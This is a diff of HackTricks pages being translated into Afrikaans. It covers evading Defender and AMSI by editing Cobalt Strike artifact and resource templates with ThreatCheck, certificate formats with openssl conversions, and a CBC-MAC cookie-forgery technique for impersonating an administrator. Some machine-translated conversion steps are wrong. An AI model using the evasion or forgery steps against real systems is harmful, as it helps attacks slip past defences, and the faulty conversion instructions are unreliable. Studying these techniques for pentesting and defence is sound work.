Deur [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) te gebruik met die gegenereerde agterdeur (of net met die saamgestelde sjabloon) kan jy vind wat verdediger aktiveer. Dit is gewoonlik 'n string. Jy kan dus net die kode wat die agterdeur genereer wysig sodat daardie string nie in die finale binêre lêer verskyn nie.
Nadat jy die kode gewysig het, voer jy net `./build.sh` uit vanuit dieselfde gids en kopieer die `dist-pipe/`-gids na die Windows-kliënt in `C:\Tools\cobaltstrike\ArtifactKit`.
```
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```
Moenie vergeet om die aggressiewe skrip `dist-pipe\artifact.cna` te laai om aan te dui dat Cobalt Strike die hulpbronne vanaf die skyf moet gebruik wat ons wil hê en nie die een wat gelaai is nie.
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
### Hulpbronpakket
### Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
Die Hulpbronpakket-vouer bevat die sjablone vir Cobalt Strike se skripsgebaseerde vragte, insluitend PowerShell, VBA en HTA.
Deur [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) saam met die sjablone te gebruik, kan jy vind wat die verdediger (AMSI in hierdie geval) nie wil hê nie en dit wysig:
```
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
```
### Verander die opgespoorde lyne sodat jy 'n sjabloon kan genereer wat nie opgemerk sal word nie.
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
Moenie vergeet om die aggressiewe skrip `ResourceKit\resources.cna` te laai om aan te dui dat Cobalt Strike die hulpbronne vanaf die skyf moet gebruik wat ons wil hê en nie die een wat gelaai is nie.
```bash
cd C:\Tools\neo4j\bin
neo4j.bat console
@ -233,3 +222,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```

244
cryptography/certificates.md
View file

@ -1,59 +1,58 @@
# Certificates
# Sertifikate
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloei** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## What is a Certificate
## Wat is 'n Sertifikaat
A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible.
'n **Openbare sleutel sertifikaat** is 'n digitale ID wat in kriptografie gebruik word om te bewys dat iemand 'n openbare sleutel besit. Dit sluit die sleutel se besonderhede, die eienaar se identiteit (die onderwerp), en 'n digitale handtekening van 'n vertroude gesag (die uitreiker) in. As die sagteware die uitreiker vertrou en die handtekening geldig is, is veilige kommunikasie met die sleutel se eienaar moontlik.
Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each others keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280.
Sertifikate word meestal uitgereik deur [sertifikaatowerhede](https://en.wikipedia.org/wiki/Certificate_authority) (SO's) in 'n [openbare sleutel infrastruktuur](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) opset. 'n Ander metode is die [web van vertroue](https://en.wikipedia.org/wiki/Web_of_trust), waar gebruikers mekaar se sleutels direk verifieer. Die algemene formaat vir sertifikate is [X.509](https://en.wikipedia.org/wiki/X.509), wat aangepas kan word vir spesifieke behoeftes soos uiteengesit in RFC 5280.
## x509 Common Fields
## x509 Algemene Velde
### **Common Fields in x509 Certificates**
### **Algemene Velde in x509 Sertifikate**
In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields:
In x509 sertifikate speel verskeie **velde** 'n kritieke rol om die geldigheid en veiligheid van die sertifikaat te verseker. Hier is 'n uiteensetting van hierdie velde:
- **Version Number** signifies the x509 format's version.
- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking.
- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as:
- **Common Name (CN)**: Domains covered by the certificate.
- **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details.
- **Distinguished Name (DN)** encapsulates the full subject identification.
- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA.
- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date.
- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key.
- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application.
- **Weergawenommer** dui die weergawe van die x509-formaat aan.
- **Serienommer** identifiseer die sertifikaat uniek binne 'n Sertifikaatowerheid (SO) se stelsel, hoofsaaklik vir herroepingstracking.
- Die **Onderwerp**-veld verteenwoordig die eienaar van die sertifikaat, wat 'n masjien, 'n individu, of 'n organisasie kan wees. Dit sluit gedetailleerde identifikasie in soos:
- **Gemeenskaplike Naam (CN)**: Domeine wat deur die sertifikaat gedek word.
- **Land (C)**, **Ligging (L)**, **Staat of Provinsie (ST, S, of P)**, **Organisasie (O)**, en **Organisasie-eenheid (OU)** verskaf geografiese en organisatoriese besonderhede.
- **Onderskeidende Naam (DN)** sluit die volledige onderwerpidentifikasie in.
- **Uitreiker** besonderhede van wie die sertifikaat geverifieer en onderteken het, insluitend soortgelyke subvelde as die Onderwerp vir die SO.
- **Geldigheidsperiode** word aangedui deur **Nie Voor** en **Nie Na** tydstempels, wat verseker dat die sertifikaat nie voor of na 'n sekere datum gebruik word nie.
- Die **Openbare Sleutel**-afdeling, wat krities is vir die veiligheid van die sertifikaat, spesifiseer die algoritme, grootte, en ander tegniese besonderhede van die openbare sleutel.
- **x509v3-uitbreidings** verbeter die funksionaliteit van die sertifikaat deur **Sleutelgebruik**, **Uitgebreide Sleutelgebruik**, **Alternatiewe Naam van Onderwerp**, en ander eienskappe te spesifiseer om die toepassing van die sertifikaat fynaf te stel.
#### **Key Usage and Extensions**
- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment.
- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication.
- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively.
- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys.
- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status.
- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate.
#### **Sleutelgebruik en Uitbreidings**
- **Sleutelgebruik** identifiseer kriptografiese toepassings van die openbare sleutel, soos digitale handtekening of sleutelversleuteling.
- **Uitgebreide Sleutelgebruik** versmalle verder die gebruiksmoontlikhede van die sertifikaat, bv. vir TLS-bedienerverifikasie.
- **Alternatiewe Naam van Onderwerp** en **Basiese Beperking** definieer addisionele gasheernaam wat deur die sertifikaat gedek word en of dit 'n SO- of eindentiteit-sertifikaat is, onderskeidelik.
- Identifiseerders soos **Sleutelidentifiseerder van Onderwerp** en **Sleutelidentifiseerder van Gesag** verseker uniekheid en naspeurbaarheid van sleutels.
- **Gesaginligtings Toegang** en **CRL Verspreidingspunte** verskaf paaie om die uitreikende SO te verifieer en die sertifikaat-herroepingsstatus te kontroleer.
- **CT Voor-sertifikaat SCT's** bied deursigtigheidslêers, wat krities is vir openbare vertroue in die sertifikaat.
```python
# Example of accessing and using x509 certificate fields programmatically:
from cryptography import x509
@ -61,8 +60,8 @@ from cryptography.hazmat.backends import default_backend
# Load an x509 certificate (assuming cert.pem is a certificate file)
with open("cert.pem", "rb") as file:
cert_data = file.read()
certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
cert_data = file.read()
certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
# Accessing fields
serial_number = certificate.serial_number
@ -75,139 +74,180 @@ print(f"Issuer: {issuer}")
print(f"Subject: {subject}")
print(f"Public Key: {public_key}")
```
### **Verskil tussen OCSP en CRL-verspreidingspunte**
### **Difference between OCSP and CRL Distribution Points**
**OCSP** (**RFC 2560**) behels 'n kliënt en 'n responder wat saamwerk om te kontroleer of 'n digitale openbare sleutelsertifikaat herroep is, sonder om die volledige **CRL** af te laai. Hierdie metode is doeltreffender as die tradisionele **CRL**, wat 'n lys van herroepingsertifikaatserienommers verskaf, maar 'n potensieel groot lêer vereis om af te laai. CRL's kan tot 512 inskrywings insluit. Meer besonderhede is beskikbaar [hier](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm).
**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm).
### **Wat is Sertifikaattransparansie**
### **What is Certificate Transparency**
Sertifikaattransparansie help om sertifikaatverwante bedreigings te beveg deur te verseker dat die uitreiking en bestaan van SSL-sertifikate sigbaar is vir domeineienaars, CA's en gebruikers. Die doelstellings is as volg:
Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are:
* Voorkoming dat CA's SSL-sertifikate vir 'n domein uitreik sonder die domeineienaar se kennis.
* Daarstel van 'n oop ouditeringstelsel vir die opspoor van per abuis of booswillig uitgereikte sertifikate.
* Beskerming van gebruikers teen valse sertifikate.
* Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge.
* Establishing an open auditing system for tracking mistakenly or maliciously issued certificates.
* Safeguarding users against fraudulent certificates.
#### **Sertifikaatjoernale**
#### **Certificate Logs**
Sertifikaatjoernale is openbaar ouditeerbare, net byvoegbare rekords van sertifikate wat deur netwerkdienste onderhou word. Hierdie joernale verskaf kriptografiese bewyse vir ouditeringsdoeleindes. Beide uitreikingsowerhede en die publiek kan sertifikate na hierdie joernale indien of dit ondersoek vir verifikasie. Alhoewel die presiese aantal joernaalbedieners nie vasstaan nie, word verwag dat dit wêreldwyd minder as 'n duisend sal wees. Hierdie bedieners kan onafhanklik deur CA's, ISP's of enige belanghebbende entiteit bestuur word.
Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity.
#### **Ondersoek**
#### **Query**
Om Sertifikaattransparansiejoernale vir enige domein te ondersoek, besoek [https://crt.sh/](https://crt.sh).
To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh).
Verskillende formate bestaan vir die stoor van sertifikate, elk met sy eie gebruiksscenario's en verenigbaarheid. Hierdie opsomming dek die belangrikste formate en bied leiding oor die omskakeling tussen hulle.
Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them.
## **Formate**
## **Formats**
### **PEM-formaat**
- Die mees algemeen gebruikte formaat vir sertifikate.
- Vereis afsonderlike lêers vir sertifikate en privaatsleutels, gekodeer in Base64 ASCII.
- Gewone uitbreidings: .cer, .crt, .pem, .key.
- Primêr gebruik deur Apache en soortgelyke bedieners.
### **PEM Format**
- Most widely used format for certificates.
- Requires separate files for certificates and private keys, encoded in Base64 ASCII.
- Common extensions: .cer, .crt, .pem, .key.
- Primarily used by Apache and similar servers.
### **DER-formaat**
- 'n Binêre formaat van sertifikate.
- Ontbreek die "BEGIN/END CERTIFICATE"-verklarings wat in PEM-lêers gevind word.
- Gewone uitbreidings: .cer, .der.
- Word dikwels gebruik met Java-platforms.
### **DER Format**
- A binary format of certificates.
- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files.
- Common extensions: .cer, .der.
- Often used with Java platforms.
### **P7B/PKCS#7-formaat**
- Gestoor in Base64 ASCII, met uitbreidings .p7b of .p7c.
- Bevat slegs sertifikate en kettingsertifikate, sonder die privaatsleutel.
- Ondersteun deur Microsoft Windows en Java Tomcat.
### **P7B/PKCS#7 Format**
- Stored in Base64 ASCII, with extensions .p7b or .p7c.
- Contains only certificates and chain certificates, excluding the private key.
- Supported by Microsoft Windows and Java Tomcat.
### **PFX/P12/PKCS#12-formaat**
- 'n Binêre formaat wat bedienersertifikate, tussenliggende sertifikate en privaatsleutels in een lêer inkapsuleer.
- Uitbreidings: .pfx, .p12.
- Hoofsaaklik gebruik op Windows vir die invoer en uitvoer van sertifikate.
### **PFX/P12/PKCS#12 Format**
- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file.
- Extensions: .pfx, .p12.
- Mainly used on Windows for certificate import and export.
### **Omskakeling van Formate**
### **Converting Formats**
**PEM conversions** are essential for compatibility:
- **x509 to PEM**
**PEM-omskakelings** is noodsaaklik vir verenigbaarheid:
- **x509 na PEM**
```bash
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
```
- **PEM na DER**
PEM (Privacy-Enhanced Mail) en DER (Distinguished Encoding Rules) is twee verskillende formaatstandaarde vir sertifikate. PEM is 'n Base64-gekodeerde formaat wat gewoonlik gebruik word vir die stoor en oordrag van sertifikate. DER is 'n binêre formaat wat gebruik word vir die verwerking van sertifikate deur programme.
- **PEM to DER**
Om 'n PEM-sertifikaat na DER-formaat om te skakel, kan die volgende opdrag gebruik word:
```bash
openssl x509 -in certificate.pem -outform der -out certificate.der
```
Hierdie opdrag sal die PEM-sertifikaat wat in die `certificate.pem`-lêer gestoor is, omskakel na DER-formaat en dit in die `certificate.der`-lêer stoor.
```bash
openssl x509 -outform der -in certificatename.pem -out certificatename.der
```
- **DER na PEM**
Om 'n DER-sertifikaat na PEM-formaat om te skakel, kan die volgende stappe gevolg word:
- **DER to PEM**
1. Gebruik die OpenSSL-hulpmiddel om die DER-sertifikaat te ontleed en die openbare sleutel daaruit te verkry:
```plaintext
openssl x509 -inform der -in certificate.der -pubkey -noout > public_key.pem
```
2. Gebruik die OpenSSL-hulpmiddel om die DER-sertifikaat na PEM-formaat om te skakel:
```plaintext
openssl x509 -inform der -in certificate.der -out certificate.pem
```
Die DER-sertifikaat sal nou suksesvol na PEM-formaat omgeskakel word.
```bash
openssl x509 -inform der -in certificatename.der -out certificatename.pem
```
- **PEM na P7B**
- **PEM to P7B**
Om 'n PEM-sertifikaatlêer na 'n P7B-formaat om te skakel, kan die volgende stappe gevolg word:
1. Maak 'n nuwe tekslêer en kopieer die inhoud van die PEM-lêer daarin.
2. Verander die lêernaam na 'n .p7b-lêeruitbreiding.
3. Stoor die lêer en dit sal nou in die P7B-formaat wees.
Dit is belangrik om daarop te let dat die P7B-formaat 'n binêre formaat is en nie die sertifikaat se privaat sleutel bevat nie. Die P7B-lêer bevat slegs die sertifikaatketting.
```bash
openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
```
- **PKCS7 na PEM**
Om 'n PKCS7-sertifikaat na PEM-formaat om te skakel, kan die volgende stappe gevolg word:
- **PKCS7 to PEM**
1. Skep 'n nuwe tekslêer en kopieer die inhoud van die PKCS7-sertifikaat daarin.
2. Verwyder enige lynafbrekings of wit spasies in die tekslêer.
3. Voeg die volgende lyn by die begin van die tekslêer: `-----BEGIN PKCS7-----`.
4. Voeg die volgende lyn by die einde van die tekslêer: `-----END PKCS7-----`.
5. Stoor die tekslêer met die `.pem`-lêeruitbreiding.
Die PKCS7-sertifikaat is nou suksesvol omgeskakel na PEM-formaat.
```bash
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem
```
**PFX-omskakelings** is noodsaaklik vir die bestuur van sertifikate op Windows:
**PFX conversions** are crucial for managing certificates on Windows:
- **PFX to PEM**
- **PFX na PEM**
```bash
openssl pkcs12 -in certificatename.pfx -out certificatename.pem
```
- **PFX to PKCS#8** involves two steps:
1. Convert PFX to PEM
- **PFX na PKCS#8** behels twee stappe:
1. Omskakel PFX na PEM
```bash
openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem
```
2. Omskep PEM na PKCS8
2. Convert PEM to PKCS8
Om 'n PEM-sertifikaat na PKCS8-formaat om te skakel, kan jy die volgende stappe volg:
1. Installeer die OpenSSL-hulpmiddel as dit nog nie op jou stelsel geïnstalleer is nie.
2. Open 'n opdragvenster en navigeer na die plek waar die PEM-sertifikaat geleë is.
3. Voer die volgende opdrag in om die PEM-sertifikaat na PKCS8-formaat om te skakel:
```plaintext
openssl pkcs8 -topk8 -inform PEM -outform DER -in private.pem -out private.pk8 -nocrypt
```
Hier moet jy die korrekte naam van die PEM-sertifikaat vervang met die naam van jou eie sertifikaat.
4. Nadat die opdrag suksesvol uitgevoer is, sal jy 'n nuwe PKCS8-sertifikaat met die naam "private.pk8" hê.
Met hierdie stappe kan jy 'n PEM-sertifikaat na PKCS8-formaat omskep.
```bash
openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8
```
- **P7B to PFX** also requires two commands:
1. Convert P7B to CER
- **P7B na PFX** vereis ook twee opdragte:
1. Omskakel P7B na CER
```bash
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
```
2. Convert CER and Private Key to PFX
2. Omskep CER en Privaatsleutel na PFX
```bash
openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
```
***
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

76
cryptography/cipher-block-chaining-cbc-mac-priv.md
View file

@ -1,85 +1,81 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
# CBC
If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie.
As die **koekie** **slegs** die **gebruikersnaam** is (of die eerste deel van die koekie is die gebruikersnaam) en jy wil die gebruikersnaam "**admin**" naboots. Dan kan jy die gebruikersnaam **"bdmin"** skep en die **eerste byte** van die koekie **brute force**.
# CBC-MAC
**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security.
**Cipher block chaining message authentication code** (**CBC-MAC**) is 'n metode wat in kriptografie gebruik word. Dit werk deur 'n boodskap blok vir blok te versleutel, waar elke blok se versleuteling gekoppel is aan die een voor dit. Hierdie proses skep 'n **ketting van blokke**, wat verseker dat selfs 'n enkele bit van die oorspronklike boodskap 'n onvoorspelbare verandering in die laaste blok van versleutelde data sal veroorsaak. Om so 'n verandering te maak of ongedaan te maak, is die versleutelingssleutel nodig, wat sekuriteit verseker.
To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E:
Om die CBC-MAC van 'n boodskap m te bereken, word m in CBC-modus met 'n nul-inisialisasievektor versleutel en die laaste blok behou. Die volgende figuur skets die berekening van die CBC-MAC van 'n boodskap wat uit blokke bestaan![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) deur 'n geheime sleutel k en 'n blokversleuteling E:
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
# Vulnerability
# Kwesbaarheid
With CBC-MAC usually the **IV used is 0**.\
This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So:
Met CBC-MAC word die **IV wat gebruik word, gewoonlik as 0** gestel.\
Dit is 'n probleem omdat 2 bekende boodskappe (`m1` en `m2`) onafhanklik 2 handtekeninge (`s1` en `s2`) sal genereer. So:
* `E(m1 XOR 0) = s1`
* `E(m2 XOR 0) = s2`
Then a message composed by m1 and m2 concatenated (m3) will generate 2 signatures (s31 and s32):
Dan sal 'n boodskap wat bestaan uit m1 en m2 gekombineer (m3) 2 handtekeninge genereer (s31 en s32):
* `E(m1 XOR 0) = s31 = s1`
* `E(m2 XOR s1) = s32`
**Which is possible to calculate without knowing the key of the encryption.**
**Dit is moontlik om dit te bereken sonder om die versleutelingssleutel te ken.**
Imagine you are encrypting the name **Administrator** in **8bytes** blocks:
Stel jou voor jy versleutel die naam **Administrator** in blokke van **8 byte**:
* `Administ`
* `rator\00\00\00`
You can create a username called **Administ** (m1) and retrieve the signature (s1).\
Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\
now, you can use s32 as the signature of the full name **Administrator**.
Jy kan 'n gebruikersnaam skep met die naam **Administ** (m1) en die handtekening (s1) daarvan bekom.\
Dan kan jy 'n gebruikersnaam skep met die resultaat van `rator\00\00\00 XOR s1`. Dit sal `E(m2 XOR s1 XOR 0)` genereer, wat s32 is.\
Nou kan jy s32 gebruik as die handtekening van die volledige naam **Administrator**.
### Summary
### Opsomming
1. Get the signature of username **Administ** (m1) which is s1
2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.**
3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**.
1. Kry die handtekening van die gebruikersnaam **Administ** (m1), wat s1 is.
2. Kry die handtekening van die gebruikersnaam **rator\x00\x00\x00 XOR s1 XOR 0**, wat s32 is.
